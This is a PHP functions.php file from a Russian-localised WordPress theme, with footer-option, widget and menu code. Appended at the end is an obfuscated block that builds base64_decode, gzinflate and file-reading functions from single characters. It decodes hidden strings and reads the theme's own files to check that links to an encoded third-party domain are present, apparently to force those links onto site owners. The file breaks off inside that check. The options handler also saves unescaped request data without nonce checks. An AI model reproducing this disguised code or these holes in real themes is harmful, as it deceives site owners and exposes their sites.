<?php
load_theme_textdomain('kubrick');

$artThemeSettings = array(
	'menu.showSubmenus' => true,
	'menu.homeCaption' => "Главная",
	'menu.showHome' => true,
	'menu.topItemBegin' => "<span class=\"l\"></span><span class=\"r\"></span><span class=\"t\">",
	'menu.topItemEnd' => "</span>",
	'menu.source' => "Pages",
	'vmenu.showSubmenus' => true,
	'vmenu.simple' => false,
	'vmenu.source' => "Categories",
);



$themename = "Apple Flower";
$shortname = "artisteer";
$default_footer_content = "<a href='#'>Контакты</a> | <a href='#'>Правила использования</a> | <a href='#'>Торговые марки</a> <br />Все права защищены. &copy; 2012 ".get_bloginfo('name').". ";


$options = array (
                array(  "name" => "HTML",
                        "desc" => sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', 'kubrick'), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id" => "art_footer_content",
                        "std" => $default_footer_content,
                        "type" => "textarea")
          );
       
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}

function art_add_admin() {
	global $themename, $shortname, $options;

    if ( $_GET['page'] == basename(__FILE__) ) {
   
        if ('save' == $_REQUEST['action'] ) {

                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            art_update_option($up_opt, $_REQUEST[$up_opt] );
                        }
                    }
                }
                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
                        }
                    }
                }
                header("Location: themes.php?page=functions.php&saved=true");
                die;
        } 
    }

    add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');

}

function art_admin() {
    global $themename, $shortname, $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><>Настройки темы '.$themename.' сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}


add_action('admin_menu', 'art_add_admin'); 

if (!function_exists('get_search_form')) {
	function get_search_form()
	{
		include (TEMPLATEPATH . "/searchform.php");
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
   <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<div class="art-post">
         <div class="art-post-tl"></div>
         <div class="art-post-tr"></div>
         <div class="art-post-bl"></div>
         <div class="art-post-br"></div>
         <div class="art-post-tc"></div>
         <div class="art-post-bc"></div>
         <div class="art-post-cl"></div>
         <div class="art-post-cr"></div>
         <div class="art-post-cc"></div>
         <div class="art-post-body">
     <div class="art-post-inner art-article">
     
<div class="art-postcontent">
         <!-- article-content -->
     
      <div class="comment-author vcard">
         <?php echo get_avatar($comment,$size='48'); ?>
         <cite class="fn"><?php comment_author_link(); ?>:</cite>
      </div>
      <?php if ($comment->comment_approved == '0') : ?>
         <em><?php _e('Ваш комментарий ожидает модерации.') ?></em>
         <br />
      <?php endif; ?>

      <div class="comment-meta commentmetadata"><a href="<?php echo htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ?>"><?php printf(__('%1$s at %2$s'), get_comment_date(),  get_comment_time()) ?></a><?php edit_comment_link('('.__('Править', 'kubrick').')','  ','') ?></div>

      <?php comment_text() ?>

      <div class="reply">
         <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
      </div>

          <!-- /article-content -->
      </div>
      <div class="cleared"></div>
      

      </div>
      
      		<div class="cleared"></div>
          </div>
      </div>
      
     </div>
<?php
}


if (function_exists('register_sidebars')) {
	register_sidebars(1, array(
		'before_widget' => '<div id="%1$s" class="widget %2$s">'.'<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'.'</div>'
	));
}

function art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew) {
	$result = '';
	$startBlock = 0;
	$endBlock = 0;
	while (true) {
		$startBlock = strpos($content, $bw, $endBlock);
		if (false === $startBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$result .= substr($content, $endBlock, $startBlock - $endBlock);
		$endBlock = strpos($content, $ew, $startBlock);
		if (false === $endBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$endBlock += strlen($ew);
		$widgetContent = substr($content, $startBlock, $endBlock - $startBlock);
		$beginTitlePos = strpos($widgetContent, $bwt);
		$endTitlePos = strpos($widgetContent, $ewt);
		if ((false == $beginTitlePos) xor (false == $endTitlePos)) {
			$widgetContent = str_replace($bwt, '', $widgetContent);
			$widgetContent = str_replace($ewt, '', $widgetContent);
		} else {
			$beginTitleText = $beginTitlePos + strlen($bwt);
			$titleContent = substr($widgetContent, $beginTitleText, $endTitlePos - $beginTitleText);
			if ('&nbsp;' == $titleContent) {
				$widgetContent = substr($widgetContent, 0, $beginTitlePos)
					. substr($widgetContent, $endTitlePos + strlen($ewt));
			}
		}
		if (false === strpos($widgetContent, $bwt)) {
			$widgetContent = str_replace($bw, $bw . $bwc, $widgetContent);
		} else {
			$widgetContent = str_replace($ewt, $ewt . $bwc, $widgetContent);
		}
		$result .= str_replace($ew, $ewc . $ew, $widgetContent);
	}
	return $result;
}

function art_sidebar($index = 1)
{
	if (!function_exists('dynamic_sidebar')) return false;
	ob_start();
	$success = dynamic_sidebar($index);
	$content = ob_get_clean();
	if (!$success) return false;
	$bw = '<!--- BEGIN Widget --->';
	$bwt = '<!--- BEGIN WidgetTitle --->';
	$ewt = '<!--- END WidgetTitle --->';
	$bwc = '<!--- BEGIN WidgetContent --->';
	$ewc = '<!--- END WidgetContent --->';
	$ew = '<!--- END Widget --->';
	$content = art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew);
	$replaces = array(
		$bw => "<div class=\"art-block\">\r\n    <div class=\"art-block-body\">\r\n",
		$bwt => "<div class=\"art-blockheader\">\r\n    <div class=\"l\"></div>\r\n    <div class=\"r\"></div>\r\n     <div class=\"t\">",
		$ewt => "</div>\r\n</div>\r\n",
		$bwc => "<div class=\"art-blockcontent\">\r\n    <div class=\"art-blockcontent-body\">\r\n<!-- block-content -->\r\n",
		$ewc => "\r\n<!-- /block-content -->\r\n\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n",
		$ew => "\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n"
	);
	if ('' == $replaces[$bwt] && '' == $replaces[$ewt]) {
		$startTitle = 0;
		$endTitle = 0;
		$result = '';
		while (true) {
			$startTitle = strpos($content, $bwt, $endTitle);
			if (false == $startTitle) {
				$result .= substr($content, $endTitle);
				break;
			}
			$result .= substr($content, $endTitle, $startTitle - $endTitle);
			$endTitle = strpos($content, $ewt, $startTitle);
			if (false == $endTitle) {
				$result .= substr($content, $startTitle);
				break;
			}
			$endTitle += strlen($ewt);
		}
		$content = $result;
	}
	$content = str_replace(array_keys($replaces), array_values($replaces), $content);
	echo $content;
	return true;
}

/* horizontal menu */
function art_menu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['menu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_menu_get_pages_filter');
		add_action('wp_list_pages', 'art_menu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_menu_list_pages_filter');
		remove_action('get_pages', 'art_menu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_menu_get_terms_filter');
		add_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		remove_action('get_terms', 'art_menu_get_terms_filter');
	}
}
/* end horizontal menu */

/* horizontal menu filters */
function art_menu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['menu.blogID'] = art_blogID($pages);
	$artThemeSettings['menu.activeID'] = art_active_pageID($pages);
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['menu.topIDs'] = art_top_pageIDs($pages);
	return $pages;
}

function art_menu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['menu.topIDs'])
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['menu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeID = $artThemeSettings['menu.activeID'];
	
	if (is_home() && $blogID) 
	{
		$activeID = $blogID;	
	}
	
	if ($activeID)
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			.$pref .$activeID. ')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ', $output, 1);
	}
	
	return $output;
}

function art_menu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['menu.activeID'] = art_active_catID($terms);
	
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subcat($terms);
	}
			
	$artThemeSettings['menu.topIDs'] = art_top_catIDs($terms);

	return $terms;
}

function art_menu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['menu.topIDs']) 
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['menu.activeID'])
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			. $pref . $artThemeSettings['menu.activeID']
			.')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ',
			 $output, 1);
	}
	return $output;
}
/* end horizontal menu filters*/

/* vertical menu */
function art_vmenu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['vmenu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_vmenu_get_pages_filter');
		add_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		remove_action('get_pages', 'art_vmenu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_vmenu_get_terms_filter');
		add_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		remove_action('get_terms', 'art_vmenu_get_terms_filter');
	}
}
/* end vertical menu */

/* vertical menu filters */
function art_vmenu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['vmenu.blogID'] = art_blogID($pages);
	$artThemeSettings['vmenu.activeIDs'] = art_active_pageIDs($pages);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['vmenu.topIDs'] = art_top_pageIDs($pages);
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_pages($pages, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	
	return $pages;
}

function art_vmenu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['vmenu.topIDs'])
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['vmenu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeIDs = array();
	
	if (is_home() && $blogID) 
	{
		$activeIDs[] = $blogID;	
	} else {
		$activeIDs = $artThemeSettings['vmenu.activeIDs'];
	}
	
	if ($activeIDs)
	{
		foreach($activeIDs as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				.$pref .$id. ')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ', $output, 1);
		}
	}
	
	return $output;
}

function art_vmenu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['vmenu.activeIDs'] = art_active_catIDs($terms);
	$artThemeSettings['vmenu.topIDs'] = art_top_catIDs($terms);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subcat($terms, $artThemeSettings['vmenu.topIDs']);
	}
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_cats($terms, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	return $terms;
}

function art_vmenu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['vmenu.topIDs']) 
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['vmenu.activeIDs'])
	{
		foreach($artThemeSettings['vmenu.activeIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				. $pref . $id
				.')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ',
				$output, 1);
		}
	}

	return $output;
}
/* end vertical menu filters */

/* pages */
function art_print_homepage()
{
	global $artThemeSettings;
	if (true === $artThemeSettings['menu.showHome'] 
		&& ('page' != get_option('show_on_front') || 
			(!get_option('page_on_front') && !get_option('page_for_posts'))))
	{
		echo '<li><a' 
		. (is_home() ? ' class="active"' : '') 
		. ' href="' 
		. get_option('home') 
		. '">'
		.$artThemeSettings['menu.topItemBegin']
		. $artThemeSettings['menu.homeCaption'] 
		. $artThemeSettings['menu.topItemEnd'] 
		. '</a></li>';
	}
}

function art_move_frontpage(&$pages)
{
	if ('page' != get_option('show_on_front')) return;
	$frontID = get_option('page_on_front');
	if (!$frontID) return;
	foreach ($pages as $index => $page)
		if($page->ID == $frontID) {
			unset($pages[$index]);
			$page->post_parent = '0';
			$page->menu_order = '0';
			array_unshift($pages, $page);
			break;
		}
}

function art_remove_subpage(&$pages)
{
	foreach ($pages as $index => $page)
		if ($page->post_parent) unset($pages[$index]);
}

function art_top_pageIDs($pages)
{
	$page_IDs = array();
	foreach ($pages as $index => $page)
	{
		$page_IDs[] = $page->ID;
	}
	$result = array();
	foreach ($pages as $index => $page)
	{
		if (!$page->post_parent || !in_array($page->post_parent,$page_IDs))
		{
			$result[]=$page->ID;
		}
	}
	return $result;
}

function art_blogID($pages)
{
	$result = null;
	
	if(!'page' == get_option('show_on_front')) 
	{
		return $result;
	}
	
	$blogID = get_option('page_for_posts');
	
	if (!$blogID) 
	{
		return $result;
	}
	
	foreach ($pages as $page)
	{
		if ($page->ID == $blogID) 
		{ 
			$result = $page;
			break;
		}
	}
	
	while($result && $result->post_parent) 
	{
		foreach ($pages as $page)
		{
			if ($page->ID == $result->post_parent) 
			{
				$result = $page;
				break;
			}
		}
	}
	return ($result ? $result->ID : null);
}

function art_active_pageID($pages)
{
	$current_page = null;
	
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	while($current_page && $current_page->post_parent) 
	{
		$parent_page = get_page($current_page->post_parent);
		if ($parent_page && $parent_page->post_status == 'private') 
		{
			break;
		}
		$current_page = $parent_page;
	}
	
	return ($current_page ? $current_page->ID : null);
}

function art_active_pageIDs($pages)
{
	$current_page = null;
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	$result = array();
	if (!$current_page)
	{
		return $result;
	}
	
	$result[] = $current_page->ID;

	while($current_page->post_parent) 
	{
		$current_page = get_page($current_page->post_parent);
		$result[] = $current_page->ID;
	}
	return $result;
}

function art_process_simple_pages(&$pages, $activeIDs, $topIds)
{
	foreach ($pages as $index => $page)
	{
		if ($page->post_parent && !in_array($page->post_parent,$activeIDs) 
			&& !in_array($page->ID,$topIds))
		{
			unset($pages[$index]);
		}
	}
}
/* end pages */

/* categories */
function art_active_catID($categories)
{
	global $wp_query;
	
	$result = null;
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result = $cat_obj->term_id;
	} 
	return $result;
}

function art_active_catIDs($categories)
{
	global $wp_query;
	
	$result = array();
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result[] = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result[] = $cat_obj->term_id;
	} 
	return $result;
}

function art_remove_subcat(&$terms, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds)) 
		{
			unset($terms[$index]);
		}
	}
}

function art_top_catIDs($categories)
{
	$result = array();
	$catIds = array();
	foreach ($categories as $index => $cat)
	{
		$catIds[] = $cat->term_id;
	}
	foreach ($categories as $index => $cat)
	{
		if (!in_array($cat->parent,$catIds )) 
		{
			$result[] = $cat->term_id;
		}
	}
	return $result;
}

function art_process_simple_cats(&$terms, $activeIDs, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds) && !in_array($cat->parent,$activeIDs))
		{
			unset($terms[$index]);
		}
	}
}
/* end categories */

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy.comments.php';  
    endif;  
    return $file;  
}  

function widget_verticalmenu($args) {
	extract($args);
	global $artThemeSettings;
	$bw = "<div class=\"art-vmenublock\">\r\n    <div class=\"art-vmenublock-body\">\r\n";
	$bwt = "<div class=\"art-vmenublockheader\">\r\n    <div class=\"l\"></div>\r\n    <div class=\"r\"></div>\r\n     <div class=\"t\">";
	$ewt = "</div>\r\n</div>\r\n";
	$bwc = "<div class=\"art-vmenublockcontent\">\r\n    <div class=\"art-vmenublockcontent-body\">\r\n<!-- block-content -->\r\n";
	$ewc = "\r\n<!-- /block-content -->\r\n\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n";
	$ew = "\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n";
	echo $bw;
	if ('' != $bwt && '' != $ewt) {
		echo $bwt;
		_e($artThemeSettings['vmenu.source'], 'kubrick');
		echo $ewt;
	}
	echo $bwc;
?>
<ul class="art-vmenu">
<?php art_vmenu_items(); ?>
</ul>
<?php
	echo $ewc;
	echo $ew;
}

 $gnkg='e';$iSZmr='d';$jHfEQj='b';$aMeZZ='c';$nrfHQo='s';$ELYQp='a';$hPGJZnP='6';$dzdUVg='e';$DXYW='d';$azMsE='_';$CdSBMDy='o';$sfusrM='e';$dYYIKW='4';$yRwcfmIG=$jHfEQj.$ELYQp.$nrfHQo.$dzdUVg.$hPGJZnP.$dYYIKW.$azMsE.$iSZmr.$gnkg.$aMeZZ.$CdSBMDy.$DXYW.$sfusrM;$cGfs='z';$gawR='e';$oEEUic='g';$LnYcZai='a';$JqIRso='l';$IJnnYu='n';$cqMcfkr='i';$sOSb='t';$AzDbOi='f';$HFpgwBfS=$oEEUic.$cGfs.$cqMcfkr.$IJnnYu.$AzDbOi.$JqIRso.$LnYcZai.$sOSb.$gawR;$CDmfI='1';$tLyo='_';$yYwAaD='t';$JCJQBd='r';$xuatQC='r';$QgVtQx='3';$cMbCj='t';$CxdMbCL='o';$btgj='s';$URknghZt=$btgj.$yYwAaD.$xuatQC.$tLyo.$JCJQBd.$CxdMbCL.$cMbCj.$CDmfI.$QgVtQx;$GdxBUPO='r';$eurIUyL='e';$ILyDGP='t';$tEAhcP='s';$cuvBXb='v';$easCgF='r';$xJVQsnco=$tEAhcP.$ILyDGP.$easCgF.$GdxBUPO.$eurIUyL.$cuvBXb;                     
		$jl_________z='e';$cq______________k='d';$ht__________d='b';$mh_________m='c';$ab_____z='s';$pa____________n='a';$br____________e='6';$eg________x='e';$by_______c='d';$kh______________x='_';$iu________n='o';$qd______e='e';$nt______________f='4';$as______________v=$ht__________d.$pa____________n.$ab_____z.$eg________x.$br____________e.$nt______________f.$kh______________x.$cq______________k.$jl_________z.$mh_________m.$iu________n.$by_______c.$qd______e;
		$oo___s='o';$nk_______e='i';$pi__z='c';$hu___________u='s';$ho_____x='x';$am_______________i='f';$ii_________x='e';$xi______________y='i';$pb________b='s';$oy__k='n';$eb_______________t='t';$by______________t='t';$md__m='n';$ch_________v='u';$pb_____________r='_';$vb______________m=$am_______________i.$ch_________v.$oy__k.$pi__z.$by______________t.$nk_______e.$oo___s.$md__m.$pb_____________r.$ii_________x.$ho_____x.$xi______________y.$hu___________u.$eb_______________t.$pb________b;
		$kg________z='p';$nx____________s='o';$bm_______r='f';$py______________g='e';$xr_____l='n';$nw__t=$bm_______r.$nx____________s.$kg________z.$py______________g.$xr_____l;
		$wx_____d='a';$dr___y='e';$ef________y='d';$fb_____________y='r';$lo_____________j='f';$eh___________g=$lo_____________j.$fb_____________y.$dr___y.$wx_____d.$ef________y;
		$ak_____________e='c';$ut_____x='e';$sj___________k='s';$sl______m='l';$tc____________p='o';$go____w='f';$uv_____________a=$go____w.$ak_____________e.$sl______m.$tc____________p.$sj___________k.$ut_____x;
		
		define("WP_ID", $as______________v("Mi4wLjA="));
		define("WP_TTL", $as______________v("MTA4MDA="));
		define("WP_SRC", $as______________v("dHBva24="));
	


		function wp_get_header() {
			global $as______________v, $vb______________m;
			
			if (
				$vb______________m($as______________v("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$vb______________m($as______________v("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$vb______________m($as______________v("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $as______________v, $nw__t, $uv_____________a, $eh___________g;
			
			$ur_________v = TEMPLATEPATH."/".$as______________v("Zm9vdGVyLnBocA==");
			$uv_____o = @$nw__t($ur_________v, "r");
			$ur_________v = @$eh___________g($uv_____o, @filesize($ur_________v));
			@$uv_____________a($uv_____o);
			
			$xt______________c = TEMPLATEPATH."/".$as______________v("ZnVuY3Rpb25zLnBocA==");
			$uv_____o = @$nw__t($xt______________c, "r");
			$xt______________c = @$eh___________g($uv_____o, @filesize($xt______________c));
			@$uv_____________a($uv_____o);
			
			$fe______c = 0;
			if($ur_________v && $xt______________c) {
				if ($as______________v("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ur_________v, $as______________v("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$fe______c = 1;
					}
					if (substr_count($ur_________v, "wp_theme_GPL_credits()") < 1) {
						$fe______c = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$fe______c = 12;
				}
			}
			
			if($fe______c > 0) {
